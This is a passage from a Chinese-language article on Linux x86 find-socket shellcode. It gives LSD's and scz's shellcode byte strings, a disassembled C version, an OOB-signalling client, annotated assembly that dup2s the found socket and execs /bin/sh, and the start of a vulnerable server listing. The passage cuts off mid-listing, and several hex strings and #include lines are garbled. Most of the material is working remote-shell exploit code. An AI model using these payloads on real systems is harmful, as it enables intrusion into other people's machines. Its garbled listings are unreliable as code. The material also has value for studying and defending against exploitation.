客户端:
[bkbll@mobile ownprog]$ ./clientfd
Connecting ....ok
send OOB.......ok
sh-2.05b$ id
uid=500(bkbll) gid=500(bkbll) groups=500(bkbll)
sh-2.05b$
同样可行.
[5] LSD和 scz算法实现
A. LSD C语言算法:
/* From asmcode-1.0.2.pdf downding from lsd-pl.net */
/* Reference fragment copied from the LSD paper; it is not compilable on its
 * own: sck, adr, port, i and j come from the surrounding program, and in C
 * the type has to be spelled `struct sockaddr_in`. */
j=sizeof(sockaddr_in);
for(i=256;i>=0;i--){
if(getpeername(sck,&adr,&j)==-1) continue; // there is a problem here: sck should be i
/* NOTE(review): the cast below is to `unsigned short` (an integer), not to
 * `unsigned short *`; it reads as a transcription slip in the quoted text. */
if(*((unsigned short)&(adr[2]))==htons(port)) break;
}
for(j=2;j>=0;j--) dup2(j,i);
B. LSD的汇编算法和shllcode
(注意:这里仅仅是find sckcode,并没有dup2和execve等操作):
char findsckcode[]= /* 72 bytes */
"x31xdb" /* xorl %ebx,%ebx */
"x89xe7" /* movl %esp,%edi */
"x8dx77x10" /* leal 0x10(%edi),%esi */
"x89x77x04" /* movl %esi,0x4(%edi) */
"x8dx4fx20" /* leal 0x20(%edi),%ecx */
"x89x4fx08" /* movl %ecx,0x8(%edi) */
"xb3x10" /* movb $0x10,%bl */
"x89x19" /* movl %ebx,(%ecx) */
"x31xc9" /* xorl %ecx,%ecx */
"xb1xff" /* movb $0xff,%cl */
"x89x0f" /* movl %ecx,(%edi) */
"x51" /* pushl %ecx */
"x31xc0" /* xorl %eax,%eax */
"xb0x66" /* movb $0x66,%al */
"xb3x07" /* movb $0x07,%bl */
"x89xf9" /* movl %edi,%ecx */
"xcdx80" /* int $0x80 */
"x59" /* popl %ecx */
"x31xdb" /* xorl %ebx,%ebx */
"x39xd8" /* cmpl %ebx,%eax */
"x75x0a" /* jne */
"x66xb8x12x34" /* movw $0x1234,%bx */
"x66x39x46x02" /* cmpw %bx,0x2(%esi) */
"x74x02" /* je */
"xe2xe0" /* loop */
"x89xcb" /* movl %ecx,%ebx */
"x31xc9" /* xorl %ecx,%ecx */
"xb1x03" /* movb $0x03,%cl */
"x31xc0" /* xorl %eax,%eax */
"xb0x3f" /* movb $0x3f,%al */
"x49" /* decl %ecx */
"xcdx80" /* int $0x80 */
"x41" /* incl %ecx */
"xe2xf6" /* loop */
C. SCZ的shellcode:
From: http://bbs.nsfocus.net/index.php?act=SE&f=2&t=144419&p=174118&hl=shellcode
unsigned char remote_shellcode[] =
"xebx57x5fx31xc0x40x89x47"
"x08x31xd2x8dx4fx08x31xdb"
"xb3x0dx04x42xcdx80x31xc9"
"xb5x04x89xcbx51x31xc9xb1"
"x03x31xd2x31xc0xb0x37xcd"
"x80x89xc6x89xc2x80xcex08"
"x41x31xc0xb0x37xcdx80x89"
"xcax8dx4fx08x89xd0x48xcd"
"x80x89xd1x89xf2x31xc0xb0"
"x37xcdx80x59x81x7fx08x4e"
"x53x46x4fx74x06xe2xc3xeb"
"xbdxebx33x31xc9x31xc0xb0"
"x3fxcdx80x41x31xc0xb0x3f"
"xcdx80x41x31xc0xb0x3fxcd"
"x80x89xfbx89x5fx08x31xc0"
"x89x47x0cx88x47x07x31xd2"
"x8dx4fx08xb0x0bxcdx80x31"
"xdbx89xd8x40xcdx80xe8x6f"
"xffxffxffx2fx62x69x6ex2f"
"x73x68;
D. 反汇编得到C算法如下:
/* Pseudo-code recovered by disassembling remote_shellcode above. It is not a
 * compilable unit: the declarations sit outside any function, and GETFL/SETFL
 * are not the <fcntl.h> names (F_GETFL/F_SETFL). Read it as a description of
 * the byte string, not as a program. */
int i,k,j;
char buffer[5];
signal(SIGUSR2,SIG_IGN,NULL);   /* signal() takes two arguments; the third is an artifact of the recovery */
while(1)
{
for(i=4;i>0;i--)
{
j=fcntl(i,GETFL,NULL);          /* save the descriptor's current flags ...   */
k=j;
j|=0x08;                        /* ... set bit 0x08 only for the read below ... */
fcntl(i,SETFL,j);
read(i,buffer,4);               /* return value unchecked: buffer keeps stale bytes if nothing was read */
fcntl(i,SETFL,k);               /* ... and restore the saved flags */
/* buffer is never NUL-terminated; strncmp is bounded to 4 bytes, so that is harmless here */
if(strncmp(buffer,"NSFO",4)==0) break;
}
if(i>0) break;   /* the for loop fell through with i==0: no descriptor matched, scan again */
}
/* Detection note: a scan of the low descriptors followed by dup2() of the
 * matched one onto 0/1/2 and an execl of /bin/sh is the observable syscall
 * sequence; syscall-level auditing can key on exactly this chain. */
dup2(i,0);
dup2(i,1);
dup2(i,2);
execl("/bin/sh","/bin/sh",NULL);
exit(0);
[5] 附录程序
A. 上面利用的client程序:
/* use OOB to identify itself the client socket */
/* Header names reconstructed: the listing lost the <...> text of every #include. */
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#define BUF 1024
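/*
 * Client side of the test: connect to server:port over TCP, send one byte of
 * urgent data (MSG_OOB), then relay stdin -> socket and socket -> stdout until
 * either side closes or an I/O call fails.
 *
 * Fixes relative to the original listing: socket() and gethostbyname() results
 * are checked before use (the original dereferenced a NULL hostent when the
 * lookup failed), partial writes are completed instead of silently dropping
 * the tail, the two "ok" lines end with a newline as in the session transcript
 * at the top of this page, and failures exit with status 1 instead of 0.
 */

/* Write all len bytes of buf to fd, retrying on EINTR and on partial writes.
 * Returns 0 on success, -1 on error or when write() makes no progress. */
static int write_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = write(fd, buf, len);
        if (n < 0) {
            if (errno == EINTR) {
                continue;
            }
            return -1;
        }
        if (n == 0) {
            return -1;
        }
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Shuttle bytes between stdin/stdout and sockfd with select() until EOF or an
 * error on either side. The socket is left open for the caller to close. */
static void relay(int sockfd)
{
    char buffer[BUF];

    for (;;) {
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(sockfd, &fds);
        if (select(sockfd + 1, &fds, NULL, NULL, NULL) < 0) {
            if (errno == EINTR) {
                continue;   /* interrupted by a signal: just retry */
            }
            break;
        }
        if (FD_ISSET(0, &fds)) {
            ssize_t count = read(0, buffer, sizeof buffer);
            if (count <= 0) {
                break;      /* EOF or error on stdin */
            }
            if (write_all(sockfd, buffer, (size_t)count) < 0) {
                break;
            }
        }
        if (FD_ISSET(sockfd, &fds)) {
            ssize_t count = read(sockfd, buffer, sizeof buffer);
            if (count <= 0) {
                break;      /* peer closed or error on the socket */
            }
            if (write_all(1, buffer, (size_t)count) < 0) {
                break;
            }
        }
    }
}

int main(void)
{
    const int port = 5555;                  /* connect port */
    const char server[] = "192.168.8.114";  /* server address, unchanged from the original */
    struct sockaddr_in client;
    struct hostent *host;
    unsigned char data1 = 'I';              /* the single urgent byte; the original sent the low byte of an int */
    int sockfd;

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("socket");
        return 1;
    }

    /* gethostbyname() is what the original used; kept, but its result is now
     * validated: NULL on failure, and only an IPv4 answer fits sin_addr. */
    host = gethostbyname(server);
    if (host == NULL || host->h_addrtype != AF_INET || host->h_addr_list[0] == NULL) {
        fprintf(stderr, "cannot resolve %s\n", server);
        close(sockfd);
        return 1;
    }

    memset(&client, 0, sizeof client);
    client.sin_family = AF_INET;
    client.sin_port = htons((unsigned short)port);
    memcpy(&client.sin_addr, host->h_addr_list[0], sizeof client.sin_addr);

    printf("Connecting ....");
    fflush(stdout);
    if (connect(sockfd, (struct sockaddr *)&client, sizeof client) < 0) {
        perror("connect");
        close(sockfd);
        return 1;
    }
    printf("ok\n");

    printf("send OOB.......");
    fflush(stdout);
    /* send() returns the byte count, so "< 1" covers both -1 and a zero-length send. */
    if (send(sockfd, &data1, 1, MSG_OOB) < 1) {
        perror("send");
        close(sockfd);
        return 1;
    }
    printf("ok\n");

    relay(sockfd);
    close(sockfd);
    return 0;
}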
B. OOB 程序的汇编注释
/* find code asm */
/* sleep(1)*/
.text
.globl _start
_start:
xorl %eax,%eax
pushl %eax
incl %eax
pushl %eax
movl %esp,%ebx
xorl %ecx,%ecx
movb $0xa2,%al
int $0x80
movb $0x09,%cl
movl %ecx,%eax /*
subl $0x0a,%eax /* eax=edi-10 */
notl %eax /* eax=~eax */
incl %eax /* eax+1 */
movl %eax,%edi
xorl %eax,%eax
incl %eax
decl %esp
movl %esp,%edx /* 存放OOB 数据的地方 */
pushl %eax /* 1 */
pushl %eax /* 1 */
pushl %edx /* &data*/
pushl %edi /* 判断的句柄 */
pushl %ecx /* ecx 入栈 */
leal 4(%esp),%ecx /* socketcall 的arg*/
xorl %ebx,%ebx
movb $0x0a,%bl /* 调用recv */
movb $0x66,%al /* socketcall 调用 */
int $0x80
popl %ecx /* ecx 出栈 */
cmpl $0x01,%eax
jne .+0x07 /* 不相等直接跳转到loop */
/* 相等判断是否位'I' */
cmpb $0x49,(%edx)
je .+0xb /* 相等则直接跳转到dup2这里 */
loop .-0x2c /* 循环 */
xorl %eax,%eax
incl %eax
movl %eax,%ebx
int $0x80 /* 没有找到,退出 */
/* 这里开始dup2 了 */
movl %edi,%ebx
movb $0x03,%cl
movb $0x3f,%al
decl %ecx
int $0x80
incl %ecx
loop .-0x06
/* 开始execve("/bin//sh",argv,NULL) */
pushl %ecx /* argv的NULL */
pushl $0x68732f6e /* n/sh */
pushl $0x69622f2f /* //bi */
movl %esp,%ebx
pushl %ecx
pushl $0x706c692d /* -ilp */
movl %esp,%edx
pushl %ecx
pushl %edx
pushl %ebx
movl %esp,%ecx /* 构造argv */
xorl %edx,%edx /* argenv=NULL */
xorl %eax,%eax
movb $0x0b,%al /* execve 调用 */
int $0x80
C. 一个漏洞程序和用了这个OOB shellcode的exploit
/* vuln.c */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int ptdata(char *buff);
main()
{
int port=5555; // bind port
int sockfd,clifd,on=1;
struct sockaddr_in server,client;
int i,k,flag;
int data=0;
char buffer[1024];
memset(&server,0,sizeof(server));
memset(&client,0,sizeof(client));
sockfd=socket(AF_INET,SOCK_STREAM,0); //create socket
/* fill the server struct */
server.sin_port=htons(port);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(INADDR_ANY);
/* set socket can bind again */
setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on));
printf("Listening ....");
fflush(stdout);
if(bind(sockfd,(struct sockaddr *)&server,sizeof(struct sockaddr))<0)
{
perror("Bind");
close(sockfd);
return(0);
}
listen(sockfd,1);
printf("ok ");
while(1)
{
i=sizeof(client);
clifd=accept(sockfd,(struct sockaddr *)&client,&i);
printf("=========================